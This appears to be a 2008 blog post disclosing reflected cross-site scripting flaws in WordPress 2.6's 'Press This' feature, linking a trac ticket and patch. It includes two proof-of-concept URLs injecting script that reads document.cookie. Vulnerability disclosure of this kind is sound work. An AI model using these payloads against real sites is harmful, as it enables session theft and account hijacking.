Wordpress "Press This" Multiple XSS Vulnerabilityfeatures defect

    • Aug
    • 01
    • 2008

    Wordpress "Press This" Multiple XSS Vulnerability

    Posted by Avice.

    Filed under WordPress.

    5 months, 1 week ago

    XSS VulnerabilityWordPress Press this (WP 2.6) features is exposed to multiple cross-site scripting issues because it fails to sufficiently sanitize user-supplied input. The issue can be found at Wordpress trac #7220

    POC

    */wp-admin/press-this.php/?ajax=video&s=%3C/textarea%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
*/wp-admin/press-this.php/?ajax=thickbox&i=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

    Patch

    the latest patch #8320 (07/09/08 19:51:53) by Ryan

    About the Author
     

    Avice appreciates modern web development and feels strongly there is a right way and wrong way of doing it. She promotes a beautiful web while still advocating access to all users keeping web usability in the forefront of her mind.. 

    Tags:
    • August 1, 2008 at 3:16 am
    • August 1, 2008 at 4:37 am
    • url

No Responsesto “Wordpress "Press This" Multiple XSS Vulnerability”

    • stalker's photo Kaizeku Ban
    • Wordpress "Press This" Multiple XSS Vulnerability - 'Comment Guidlines' ↓
      5 months, 1 week ago on Friday, August 1st, 2008 at 3:16 am 5 url

      If you want to comment, please read the following guidelines. These are designed to protect you and other users of the site.

      1. Be relevant: Your comment should be a thoughtful contribution to the subject of the entry. Keep your comments constructive and polite.
      2. No advertising or spamming: Do not use the comment feature to promote commercial entities/products, affiliates services or websites. You are allowed to post a link as long as it's relevant to the entry.
      3. Keep within the law: Do not link to offensive or illegal content websites. Do not make any defamatory or disparaging comments which might damage the reputation of a person or organisation.
      4. Privacy: Do not post any personal information relating to yourself or anyone else (i.e., address, place of employment, telephone or mobile number or email address).

      In order to keep these experiences enjoyable and interesting for all of our users, we ask that you follow the above guidlines. Feel free to engage, ask questions, and tell us what you are thinking! insightful comments are most welcomed.

      be the first to comment.

"write as if you were talking to a good friend (in front of your mother)."

.haveyoursay

Disclaimer: For any content that you post, you hereby grant to Kaizeku Ban the royalty-free, irrevocable, perpetual, exclusive and fully sublicensable license to use, reproduce, modify, adapt, publish, translate, create derivative works from, distribute, perform and display such content in whole or in part, world-wide and to incorporate it in other works, in any form, media or technology now known or later developed. Some rights reserved.

Wp-iStalker WordPress ThemestopCopyright © 2007 - 2009 Kaizeku Ban.